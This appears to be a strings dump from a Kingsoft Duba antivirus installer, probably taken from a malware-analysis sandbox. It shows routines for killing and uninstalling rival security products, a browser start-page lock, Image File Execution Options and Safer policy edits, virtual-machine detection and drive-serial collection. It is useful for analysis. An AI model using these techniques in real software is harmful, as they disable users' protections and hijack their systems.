<class name="new_dlg_skinbutton_text" font="0004" crtext="5a5a5a" textmode="25" cursor="hand"/>

<class name="new_msg_text_end" crtext="383838" font="0100" textmode="8028"/>

<class name="skinbutton_text_download" font="0000" crtext="5a5a5a" textmode="25" cursor="hand"/>

<class name="text_link_360" crtext="717273" hoverfont="0002" crhover="60cafc" cursor="hand"/>

<class name="style_btn_360" skin="skinbtn_360" cursor="hand" font="0000" crtext="000000" textmode="25"/>

<class name="link_text_trust_quarant" crtext="0080ff" crhover="00a8e5" cursor="hand" />

<class name="new_skinbutton" skin="new_skinbutton" cursor="hand" font="0000" crtext="5a5a5a" textmode="25"/>

<class name="selpath" crtext="ffffff" textmode="25" font="0000" gdiplus="1" gdipluscalctxt="1"/>

<class name="custom" crtext="403116" font="FF00" hoverfont="FF02" gdiplus="1" gdipluscalctxt="1" cursor="hand" />

<class name="linkpath" textmode="4024" font="0002" hoverfont="0002" crtext="047ecb" crhover="10e6ff" cursor="hand" gdiplus="1" gdipluscalctxt="1"/>

<class name="custom_not_yahei" crtext="403116" textmode="25" font="0100" hoverfont="0102" gdiplus="1" gdipluscalctxt="1" cursor="hand" />

<text id="103" pos="78,28,-28,53" class="new_msg_text_end"></text>

<text id="104" pos="78,40,-28,65" class="new_msg_text_end" show="0"></text>

<check id="103" pos="190,100" crtext="FFFFFF" font="0004" show="0">

<check id="105" pos="190,160" crtext="FFFFFF" font="0004" show="0">

<check id="107" pos="190,120" crtext="FFFFFF" font="0004" show="0">

<text pos="30,5" crtext="ffffff">

<text pos="110,40" crtext="ffffff" font="0704" >

<text pos="43,20" font="0000" crtext="3D3C41">

<text pos="204,17" font="0304" crtext="E86500">

<text id="111" font="0000" pos="314,20" crtext="3D3C41">

<text pos="43,44" crtext="3D3C41">

<text pos="42,83" crtext="3D3C41">360

" skin="blue" id0="hXXp://VVV.ijinshan.com/news/20110511003.shtml" id1="hXXp://finance.qq.com/a/20110426/006595.htm">

<text pos="95,35" crtext="ca561b" font="0904" >

<text id="106" pos="15,30,-0, 50" class="new_msg_text_end"></text>

<text font="0004" pos="0,0" crtext="333333">

<!-- <text pos="30,5" crtext="ffffff">

<text pos="110,38" crtext="ffffff" font="0704" >360

<skinbtn id="202" class="new_skinbutton" crtext="000000" font="0104" pos="278,74">

GetConsoleOutputCP

GetCPInfo

WaitNamedPipeW

GetProcessHeap

GetWindowsDirectoryW

RegQueryInfoKeyW

RegDeleteKeyW

RegEnumKeyExW

RegCreateKeyExW

RegOpenKeyW

RegOpenKeyExW

RegCloseKey

RegOpenKeyExA

RegEnumKeyW

RegEnumKeyExA

SetViewportOrgEx

GetViewportOrgEx

ShellExecuteW

ShellExecuteExW

SHDeleteKeyW

ExitWindowsEx

GetKeyState

.text

`.rdata

@.data

.rsrc

j].UF"

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges>

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>

ADVAPI32.dll

COMCTL32.dll

GDI32.dll

iphlpapi.dll

MSIMG32.dll

ole32.dll

OLEAUT32.dll

PSAPI.DLL

SHELL32.dll

SHLWAPI.dll

USER32.dll

VERSION.dll

WTSAPI32.dll

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

{24F8405F-BB3A-455e-B5B3-87220CD2E244}

{AC6822FA-05D6-473b-BAE6-A5C2E0084549}

{826C229B-7EF0-4d33-AA49-D02117D188CA}

78,20,-28,45

-110,-35,-31,-9

%d.%d.%d

ddd

ressrc\chs\uplive.svr

hXXp://ct.duba.net/s/ut/

avp.exe

ffcert.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{560985FB-4B76-4121-9189-7A2CDC7886D6}

avscan.exe

avcenter.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Avira AntiVir Desktop

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

kautofix.exe

L%d-%d-%d:%d-%d

%s %s

comctl32.dll

%s\%d.bmp

%s\%d.%s

msyh.ttf

simsun.ttc

SimSun.ttc

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts

msimg32.dll

gdata\skin\skincfg.ini

tuxtheme.dll

%d%%%s

Akscan.exe

kxesapp.exe

kxedefend.exe

kxescore.exe

Global\F626D0A6-A5A1-4719-A80E-A07907F414C1-%s

kxetray.exe

btbg.gif

*.kid

scom.xml

bc.sys

clear_i.xml

%s\%s

\6EED6E3F-BDA6-490e-8F67-6ECDD0697AB2

c:\Program Files

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{052CFB79-9D62-42E3-8A15-DE66C2C97C3E}

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\thunder_is1

Global\48411015-6EB4-4469-8D21-A8A9C8B7FB0D

kpacket_info.dat

service%d

file%d

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360SD

uninst.exe

cmd.exe /c "

cmd.exe

https

kxecomm.dat

_sp.xcf

kxebase.dll

x-x-x-xx-xxxxxx

CLSID\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}

Software\Classes\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}

%d%s%s%s%d%s

%s?v=2&p=%s&u=%s&m=%s&ip=%d&s=%s&mid=%d&dsn=%s&old_svrid=%s

_duba.dat

NextReportTime

LastReportTime

*.ich

index_=%d&count_=%d

kich%d\

union_server0=hXXp://union.infoc.duba.net/nep/v1/

union_server1=hXXp://union.infoc.duba.net/nep/v1/

union_server2=hXXp://union.infoc.duba.net/nep/v1/

union_server%d

helpunion0.ksmobile.com/nep/v1/

.datx

x.dat

system32\DRIVERS\viostor.sys

vmusrvc.exe

system32\DRIVERS\vpcubus.sys

system32\DRIVERS\vpcgbus.sys

system32\DRIVERS\vpc-s3.sys

System32\vpc-s3.dll

P#{ad498944-762f-11d0-8dcb-00c04fc3358c}

ddddddd

hg.dat

QQPCRTP

QQPCTray.exe

%d Byte

%d KB

\\.\PHYSICALDRIVE0

%SYSTEM%

%WINDOWS%

%CUR_DIR%

instSubKeyName

instRootKey

%d-%x-%x-%x.ich

rcmdid

hXXp://did.ijinshan.com/db/

%d-%d-%d %d:%d:%d

data\kunioncfg.dat

\\.\Pipe\

SYSTEM\CurrentControlSet\services\%s

"%s" %s

Psapi.dll

/pid %d /f

taskkill.exe

%s%s_d_%x

\\.\KAVBase

system32\drivers\KAVBase.sys

Kernel32.dll

kavsetup.log

{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}

KANSvr.EXE

iexplore.exe

360sd.exe

360rps.exe

kavmenu.dll

ksoft.xml

hXXp://VVV.baidu.com

2012.sp3.0

2012.3.0

LdTermDaemon.exe

\LdTerm.exe

\LdxManager.exe

dinstalltimecfg.dat

%s\%s.lnk

VVV.duba.com

hXXp://VVV.duba.com

%s\kingsoft%x%s

%s\*.*

HTTP/1.1

Host: %s:%d

Content-Length: %d

ChXXp://ct.duba.net/itid

360Safe.exe

360Tray.exe

InstallDK.ini

FileName%d

BakFile:%s, OriFile:%s, ErrCode:%d, DuiKang:%d

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360

HookPort

ksetupwiz.exe

security\ksde\kisknl64.sys

security\kavbootc64.sys

security\kxescan\kdhacker64.sys

security\kxescan\kdhacker.sys

security\kxescan\bc.sys

ksapi.sys

security\ksde\kisknl.sys

security\kavbootc.sys

\5.png

\4.png

\3.jpg

\2.jpg

\1.jpg

kwstray.exe

kswbc.dll

kwsui.dll

kswebshield.exe

kswebshield.dll

KWSMain.exe

kwssp.dll

data\ghostver.dat

%d:%d:%d:%d:%d

SYSTEM\CurrentControlSet\services\Kingsoft Antivirus WebShield Service

hXXp://did.ijinshan.com/db/?v=2&p=%s&u=%s&m=%s&ip=%d&s=%s

hXXp://infoc0.duba.net/c/

ws2_32.dll

kxetray.exe.manifest

kxescore.exe.manifest

%s_%d

KFixManifest::Delete Folder %s Error(%d)!

KFixManifest::Delete File %s Error(%d)!

setup.xml

{34115DF9-B9DE-49d2-A0B0-AF60FE6EF9D2}

.product.xml

KSafe.exe

KSafeSvc.exe

QQPCMgr.exe

QQPCRTP.exe

TSSysKit.sys

d~%x\

kdrvmgr.exe

uni0nst.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Internet Security

hXXp://VVV.ijinshan.com

URLInfoAbout

kismain.exe

hXXp://download.duba.net/2011/lf/detect360.ini

ksregbackup.reg

hXXp://cu003.VVV.duba.net/duba/tools/dubatools/usb/sysfixkill.exe

hXXp://bbs.duba.net/thread-22796291-1-1.html

Ekingsoft_antivirus_test%d

regedit.exe

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

baidubrowser.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BaiduBrowser

ntdll.dll

ntoskrnl.exe

okernel32.dll

DHKEY_CURRENT_CONFIG

HKEY_DYN_DATA

HKEY_PERFORMANCE_DATA

{677B9715-5692-49f6-979F-CD11EC963EFE}

kresult.log

{C16A0C4F-108B-4580-A7A0-8DEF25D2E9EF}

Global\{E02A6D98-80B3-4a54-89E3-116EB96D0664}_EXIST

{35CCA0CB-F603-4a28-A436-CF5F47A68DFD}

Doperation\cas\kinfoc.dll

kinfoc.dll

2C14B686-5925-45e2-A3AA-12F87FAE181C

/aurl:

Internet Explorer\iexplore.exe

Advapi32.dll

from=1&ver=0.3&errcode=%d

cmdline

explorer.exe

avrepair.xml

{dda3f824-d8cb-441b-834d-be2efd2c1a33}

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths

KBigFile.exe

perfopt.exeksafe.exe

netmon.exe

ksafetray.exe

ksafesvc.exe

hXXp://VVV.duba.com/

hXXp://

http:\\

qq.com

.qq.com

123.duba.net

hXXp://VVV.duba.com/?un%s_%s

BaiduPlayerRcmdInstDuba

/lockpage3rd:hXXp://VVV.duba.com/?un%s_%s

Global\BFD88F2D-0990-4de4-AD0F-764F5894389A-%d

hXXp://bbs.duba.net/thread-22681423-1-1.html

http\shell\open\command

\iexplore.exe

Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice

IE.AssocFile.HTM

Dkavsetup_99_1.exe

hXXp://cd001.VVV.duba.net/duba/install/2013/ever/kavsetup_99_1.exe

hXXp://VVV.ijinshan.com/

{ d d d d }

nTotalScroll=%d, nScolled=%d, bAdd=%d, nChange=%d

dbkmsgwnd

TimerScroll:before:m_bkTimerScroll=%s

TimerScroll:end:m_bkTimerScroll=%s

shoujikong.exe

kphonetray.exe

filemgr.dll

appmgr.dll

data\operation_contact.dat

hXXp://wpa.b.qq.com/cgi/wpa.php?ln=1&key=XzgwMDA0MjEwMF8yMzc1NzlfODAwMDQyMTAwXzJf

liebao.exe

LBBrowser\liebao.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao

InstallExe

%d-%d-%d

hXXp://sighttp.qq.com/authd?IDKEY=4a05d1131c1eec69db5a99c1452ee9869a1af0ced4fc9956

hXXp://bbs.duba.net/thread-22672832-1-1.html

hXXp://VVV.ijinshan.com/protocol/dubaUserLicense.shtml

FhXXp://download.duba.net/2011/lf/duba_uninstall_warn_descript8.xml

hXXp://download.duba.net/2011/lf/duba_uninstall_warn_tip8.png

warntype=%d&click=%d

\ux

Fkvipcore.dll

passport

s%s_d_%x

kisknl64.sys

kisknl.sys

%s\%d-%x-%x-%x.ich

.hXXp://infoc2.duba.net/c/

hXXp://tj.union.ijinshan.com/c/

-unionid=%s

"%s%s" -autorun

%s_%s

RightKeyKillVirusMenu

RightKeyDeleteFileMenu

desktop.ini

d[.ShellClassInfo]

IconFile=kxetray.exe

dscom.dll

dinstall.xml

clear.xml

H\winhttp.dll

HTTP/1.1

\wbem\wuapiget.dll

\wbem\localun.dll

\wbem\keysmgr.dll

\wbem\wuapier.sys

c_999223.dat

%Program Files%\Amd495Sbses53

%Program Files%\Admin704Win

%Program Files%\AdminWin

%Program Files%\AdminLive

%Program Files%\AdminMgr

calcengine.dat

calcengine.dll

\drivers\npfs139.sys

kpopserver.exe

krepair.exe

kabaload.exe

KASMain.exe

KASTask.exe

KAVDX.exe

KAV32.exe

KAVPFW.exe

KAVSetup.exe

KAVStart.exe

killhidepid.exe

KISLnchr.exe

kissvc.exe

KMailMon.exe

KMFilter.exe

KPFWSvc.exe

krnl360svc.exe

KsLoader.exe

KVSrvXP.exe

kvupload.exe

kvwsc.exe

KvXP_1.kxp

KWatch.exe

KWatch9x.exe

KWatchX.exe

KSafeTray.exe

upsvc.exe

kislive.exe

KWSUpd.exe

kwsmain.exe

KSWebShield.exe

uniuwiz.exe

ksmsvc.exe

ksmgui.exe

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

\????????.sys

xxxxxxxx.sys

%System%\drivers\p2phook.sys

%System%\drivers\nthook.sys

%System%\drivers\nhook.sys

%System%\drivers\persist.sys

%System%\uspx.dll

%System%\safemon.dll

%System%\ups.dll

%System%\drivers\beep.sys

A707-22d2-9CBD-0000F87A469H}

%Program Files%\Common Files\Microsoft Shared\INK\

%WinDir%\conime\SSDT01.SYS

\*.sys

%Program Files%\AdminMgr\vmqutr.sys

%Program Files%\AdminMgr\vmqutr.dll

%Program Files%\AdminLive\vbcdtr.sys

%Program Files%\AdminLive\vbcdtr.dll

2345SafeTray.exe

2345Service.exe

deepscan\zhudongfangyu.exe

EfiMon.sys

%Program Files%\360\360Safe\

%Program Files% (x86)\360\360Safe\

%s*.*

%s%s\

ksafe.exe

ksfmon.dll

shoujizhushou.exe

kmobiletray.dll

rstray.exe

rsmain.exe

ravmond.exe

\\.\PhysicalDrive0

\\.\Scsi0

System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

D:\dream\duba_u20862342_sv1_3_18.exe

2016,01,07,15112

kpacket.exe

9,3,264354,15112

duba_u20862342_sv1_3_18.exe_632_rwx_00401000_0015B000:

u%SSSWSSSh

</td<\t`<.ud

9.Wt$9n

u`SSh

8%uAP3

t$SSh

PSSSSSSh

aSSSh

.VVVVVSRSSj

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

t.Jt Jt

8.tmpu

kernel32.dll

gdiplus.dll

.mixcrt

KERNEL32.DLL

mscoree.dll

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

WS2_32.dll

%s:%d

WARNING: failed to save cookies in %s

About to connect() to %s%s port %ld (#%ld)

Connected to %s (%s) port %ld (#%ld)

IDN support not present, can't parse Unicode (UTF-8) domains

Protocol %s not supported or disabled in libcurl

<url> malformed

:]://%[^

[^:]:%[^

http_proxy

%5[^:@]:%5[^@]

:%5[^@]

Port number too large: %lu

%s://%s%s%s:%hu%s%s%s

;type=%c

[%*45[0123456789abcdefABCDEF:.]%c

Couldn't find host %s in the _netrc file; using defaults

[email protected]

Couldn't resolve host '%s'

Couldn't resolve proxy '%s'

User-Agent: %s

Re-using existing connection! (#%ld) with host %s

%s://%s

Connection #%ld to host %s left intact

operation aborted by callback

ioctl callback returned error %d

the ioctl callback returned %d

seek callback returned error %d

Received problem %d in the chunky parser

HTTP server doesn't seem to support byte ranges. Cannot resume.

Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld

Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)

Operation timed out after %ld milliseconds with %lld bytes received

Operation timed out after %ld milliseconds with %lld out of %lld bytes received

Added %s:%d:%s to DNS cache

Resolve %s found illegal!

%5[^:]:%d:%5s

No URL set!

[^?&/:]://%c

Violate RFC 2616/10.3.2 and switch from POST to GET

Violate RFC 2616/10.3.3 and switch from POST to GET

Disables POST, goes with %s

Issue another request to this URL: '%s'

unspecified error %d

%s cookie %s="%s" for domain %s, path %s, expire %lld

#HttpOnly_

httponly

I99[^;

skipped cookie with bad tailmatch domain: %s

skipped cookie with illegal dotcount domain: %s

23[^;=]=I99[^;

%s%s%s

# Fatal libcurl error

# Netscape HTTP Cookie File

# hXXp://curl.haxx.se/rfc/cookie_spec.html

# This file was generated by libcurl! Edit at your own risk.

[%s %s %s]

Send failure: %s

Recv failure: %s

bind failed with errno %d: %s

Local port: %hu

getsockname() failed with errno %d: %s

Bind to local port %hu failed, trying next

Couldn't bind to '%s'

Name '%s' family %i resolved to '%s' family %i

Local Interface %s is ip %s using address family %i

ssloc inet_ntop() failed with errno %d: %s

ssrem inet_ntop() failed with errno %d: %s

getpeername() failed with errno %d: %s

TCP_NODELAY set

Could not set TCP_NODELAY: %s

Failed to connect to %s: %s

Trying %s...

sa_addr inet_ntop() failed with errno %d: %s

%d.%d.%d.%d

Could not resolve host: %s; %s

Could not resolve proxy: %s; %s

getaddrinfo() failed for %s:%d; %s

init_resolve_thread() failed for %s; %s

%sAuthorization: Basic %s

%s:%s

%s auth using %s with user '%s'

HTTP/

Avoided giant realloc for header (max is %d)!

The requested URL returned error: %d

If-Unmodified-Since: %s

Last-Modified: %s

If-Modified-Since: %s

%s, d %s M d:d:d GMT

Failed sending HTTP POST request

Content-Type: application/x-www-form-urlencoded

Internal HTTP POST error!

Failed sending HTTP request

%s%s=%s

%s HTTP/%s

%s%s%s%s%s%s%s%s%s%s

PTF://%s:%s@%s

Content-Range: bytes %s/%lld

Content-Range: bytes %s%lld/%lld

Range: bytes=%s

PTF://

Host: %s%s%s:%hu

Host: %s%s%s

Chunky upload is not supported by HTTP 1.0

Accept-Encoding: %s

Referer: %s

HTTP/1.0 connection set to keep alive!

HTTP/1.1 proxy connection set close!

HTTP/1.0 proxy connection set to keep alive!

HTTP 1.0, assume close after body

RTSP/%d.%d =

HTTP =

HTTP/%d.%d =

Received HTTP code %d from proxy after CONNECT

HTTP/1.%d %d

CONNECT %s:%hu HTTP/%s

%s%s%s%s

Host: %s

%s:%hu

Establish HTTP proxy tunnel to %s:%hu

Internal error removing splay node = %d

Internal error clearing splay node = %d

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.

Failed to resolve "%s" for SOCKS4 connect.

No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)

SOCKS5 GSSAPI per-message authentication is not supported.

Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)

Failed to resolve "%s" for SOCKS5 connect.

User was rejected by the SOCKS5 server (%d %d).

--:--:--

%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s

password

login

Operation too slow. Less than %ld bytes/sec transfered the last %ld seconds

Unable to parse FTP file list

Error in the SSH layer

Caller must register CURLOPT_CONV_ callback options

TFTP: No such user

TFTP: Unknown transfer ID

TFTP: Illegal operation

TFTP: Access Violation

TFTP: File Not Found

Login denied

Issuer check against peer certificate failed

Invalid LDAP URL

Unrecognized HTTP Content-Encoding

Problem with the SSL CA cert (path? access rights?)

Peer certificate cannot be authenticated with known CA certificates

Problem with the local SSL certificate

SSL peer certificate or SSH remote key was not OK

A libcurl function was given a bad argument

Operation was aborted by an application callback

FTP: command REST failed

FTP: command PORT failed

HTTP response code said error

FTP: couldn't retrieve (RETR failed) the specified file

FTP: couldn't set file type

FTP: can't figure out the host in the PASV response

FTP: unknown 227 response format

FTP: unknown PASV reply

FTP: unknown PASS reply

FTP: The server did not accept the PRET command.

FTP: weird server reply

URL using bad/illegal format or missing URL

Unsupported protocol

Winsock version not supported

Protocol family not supported

Address family not supported

Operation not supported

Socket is unsupported

Protocol is unsupported

Protocol option is unsupported

Unknown error %d (%#x)

d:d

d:d:d

0123456789

%c%c==

%c%c%c=

%c%c%c%c

.jpeg

.html

--%s--

couldn't open file "%s"

Content-Type: %s

; filename="%s"

Content-Disposition: attachment; filename="%s"

Content-Type: multipart/mixed, boundary=%s

%s; boundary=%s

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

g_Install.Init ...

g_Install.Init return:%d

DbgExtraceAllFiles return:%d

import file install need reboot

g_Install.StartLoadPacketData

not support cover install in silent mode

the old kav version not support cover install

ProcessOldProduct RunApp return:%d, file:%ws, cmd:%ws

RunAutofix RunApp return:%d

KApp::GetSilentFlag return %d silent:%d

KApp::VersionVerification return %d silent:%d

0,0,-0,%d

0,-%d,-0,-0

extern_alpha_key

crtext

headacceptlbtndownmsg

0,0,-0,-0

Kxehost OpenEvent return:%d, error:%d

kill kxetray, failcount:%d, killcount:%d

kill kxetray 2, failcount:%d, killcount:%d

StopKxetray return:%d

StopService return:%d

KFunction::KillProcessByPath failcount:%d, killcount:%d

Wait all progress exit, count:%d

Kill services retrun:%d

StopService WaitServiceExit return:%d

StopService WaitServiceExit1 return:%d

ClearBCDriver delete reg return:%d

DeleteFile return:%d, error:%d, path:%ws

KInsall::Is360AvInstalled download fail, file:%ws, nStatus:%d

6AES part of OpenSSL 0.9.8c 05 Sep 2006

User-Agent: Mozilla/4.0

Authorization: NTLM %s

Proxy-Authorization: NTLM %s

%s:xx

# Block type: 2:%x 3:%x

# DPMS capabilities: Active off:%s Suspend:%s Standby:%s

%d,%d

\\.\PhysicalDrive%d

%d ReadPhysicalDriveInNTWithAdminRights ERROR

DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d

\\.\IDE21201.VXD

\\.\Scsi%d:

Drive%dModelNumber

Drive%dSerialNumber

DriveÜontrollerRevisionNumber

DriveÜontrollerBufferSize

Drive%dType

VBoxHook.dll

\\.\VBoxMiniRdrDN

SELECT * FROM Win32_OperatingSystem WHERE (InstallDate IS NOT NULL)

lXXxXXXXXXXX

XX

xxxxxxxx

KFunction::RunApp CreateProcessW error:%d, wait:%d, show:%d, path:%ws, cmd:%ws

IsProcessRunningByDirectory CreateFile return:%d, error:%d, path:%ws

KillProcessByPath CreateToolhelp32Snapshot, error:%d

%ws:%d

KillProcessByPath OpenProcess fail, process:%ws, error:%d

Terminate Process return:%d, error:%d, pid:%d, path:%ws

StopProcessByPid pid:%d return fase

KillProcessByPid TerminateProcess return:%d, error:%d, pid:%d

KillProcessByCmd taskkill.exe %ws pid:%d return:%d, exitcode:%d, GetLastError:%d

KillProcessByPathkxescore CreateToolhelp32Snapshot, error:%d

KillProcessByPathkxescore OpenProcess fail, process:%ws, error:%d, pid:%d

AddPid1 return:%d

AddPid1:%d

AddPid2 return:%d

AddPid2:%d

StopOldSelfProtect:%d

SFP return:%d

StopSelfProtect:%d

OLDSFP return:%d

KInsall::LenoveOem return:%d

DeleteUUIDex RecurseDeleteKey :%d

DeleteFile hg.dat return:%d

SetServicesInfo return:%d

CreateShellLink return:%d, file:%ws, cmd:%ws, link:%ws

TerminateProc pid: %d reutrn:%d :dwExitCode: %d

KInstallDetect::IsInstallDuba() return:%d

error_msg

bUrlMon

CmdLine

KGetSilentFlag::GetSilentFlag return %d silentflag:%d

KImportFileInstaller::ReleaseFile---begin...

KImportFileInstaller::ReleaseFile---GetPrivateProfileString failed,strKey = %s

KImportFileInstaller::ReleaseFile---Rename failed, %s

KImportFileInstaller::ReleaseFile---end...

KImportFileInstaller::_DisableIntercept---Result = %d

load product.xml fail

found installed product, version:%ws, cover:%d, path:%ws

version:%ws, cover:%d

KInsall::IsInstalledKav return:%d

RunApp Register return:%d

KInsall::Register return:%d

GetDebugPrivilege return:%d GetLassError return:%d

cover:%d, kxescore:%d

StopAllProgress return:%d

ClearWebShield...

ClearWebShield return:%d

install end, return:%d, install cost time:%dms

install thread end:%d

KInsall::ParseConfig return:%d

AutoRunkav:%d _ Deleteuuid:%d_lockstartpage:%d

KInsall::ParseKSafe path:%ws, cmd:%ws, wait:%d, show:%d

KInsall::ParsePCMgr path:%ws, cmd:%ws, wait:%d, show:%d

ParsePCMgr return:%d

KInsall::ParseLaunch path:%ws, cmd:%ws, wait:%d, show:%d

ParseLaunch return:%d

KInsall::ParseRecommend url:%ws

KSetupWiz::RunClear return:%d

KSetupWiz::RunInstall return:%d

install ksafe return:%d

install pcmgr return:%d

IsInstallSuitPacket return:%d

ClearInvalidDrivers return:%d, error:%d, path:%ws

silent mode detect3 loadUrl return:%d

KInsall::Is360AvInstalled return:%d

FileName:%ws,param:%ws,waittime:%d bshow:%d

KInsall::FixRegError TestIsVolatieKey(kingsoft) return %d, error:%d

KInsall::FixRegError BackKey(kingsoft) return %d, error:%d

KInsall::FixRegError ImportKey(kingsoft) return %d, error:%d

KInsall::ParseTidWhiteList tid1:%d, tid2:%d

KInsall::ParseTidWhiteList return:%d

KInsall::IsInTidWhiteList return:%d

LoadProductPacket CreateThread return:%d

ExtractMemoryFiles return:%d

ExtractPacket return:%d

GetPacketData %d

GetPacketData return:%d

Extract return:%d

LoadImageToMem CreateFile error:%d, path:%ws

CreateFileByMem CreateFileMapping error:%d, path:%ws

CreateFileByMem MapViewOfFile error:%d, path:%ws

{9B8A9862-3FE6-452e-A096-31E845BF839B}

Uncompress return:%d

KSearch::Search product count:%d

KSearch::Search return:%d

KSearch::ParseConfig return:%d

KSearch::ReadRegPath wrong root key

KSearch::ReadRegPath Open key fail

KSearch::ReadRegPath Read key fail

ReadRegPath return:%d, root:%ws, path:%ws, name:%ws

IsFileListExist return not exist, error:%d, path:%ws

g_App.Run...

g_App.Run return:%d

GetExportInterface

&#xX;

</%s>

%s="%s"

%s='%s'

<!--%s-->

<![CDATA[%s]]>

version="%s"

encoding="%s"

standalone="%s"

KFixAV DeleteSubKeyTree %ws return:%d

FilterBlack() DeleteSubKeyTree %ws %ws

FixPolicies return:%d

%d-%d-%d d:d:d d

particle%d

notifymsg

SendHttpRequestEx

bubble%d

OnInstallProgress nProgress:%d, m_nProgressCount:%d

137,269,199,285

62,269,124,285

22,9,262,24

KUninstall360Dlg::CallInfoc reported:%s %s

KUninstall360GuideDlg::ReportInfo reported:%s %s

lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt

MoveFileEx Rename file fail, error:%d

CreateFile:%d

CreateFileByMem CreateFile error:%d, path:%ws

CreateFileMapping:%d

MapViewOfFile:%d

ChecksumFileByMem return%d, path:%ws

ChecksumFileByMem CreateFile error:%d, path:%ws

ChecksumFileByMem CreateFileMapping error:%d, path:%ws

ChecksumFileByMem MapViewOfFile error:%d, path:%ws

ReportV2 ...

ReportV2 end

ReportOtherInfo ...

ReportOtherInfo end

ReportLiebaoRcmd ...

ReportLiebaoRcmd end

ReportImportFileInstall ...

ReportImportFileInstall end

ReportV2BJ ...

ReportV2BJ end

ReportParentProcessInfo ...

ReportParentProcessInfo end

DeleteSubKeyTree root:%d, path:%ws

DeleteSubKeyTree return:%d

KExecReg Run Return:%d, delete:%d, root:0x%x, path:%ws, type:%d, name:%ws, value:%ws

KExecProcess Run, path:%ws, cmd:%ws, time:%d, show:%d

KExecProcessRun return:%d

KExecService Run operation:%d

KxEInstallService return:%d, path:%ws

KxEUninstallService return:%d, name:%ws

KxEStartService return:%d, name:%ws

KxEStopService return:%d, name:%ws

KExecService Run return:%d

KExecFile DeleteFile return:%d, error:%d, path:%ws

KExecLink DeleteFolder return:%d, path:%ws

KExecLink DeleteFile return:%d, error:%d, path:%ws

KExecLink CreateLink return:%d, file:%ws, cmd:%ws, link:%ws

CreateExecReg fail

CreateExecService fail

CreateExecProcess fail

CreateExecLink fail

KInstaller::ParseInstall return:%d

KInstaller::ParseCoverInstall return:%d

KInstaller::Install return:%d

KInstaller::Start return:%d

KInstaller::CoverInstall return:%d

ModifyFolderIcon _tfopen fail, error:%d

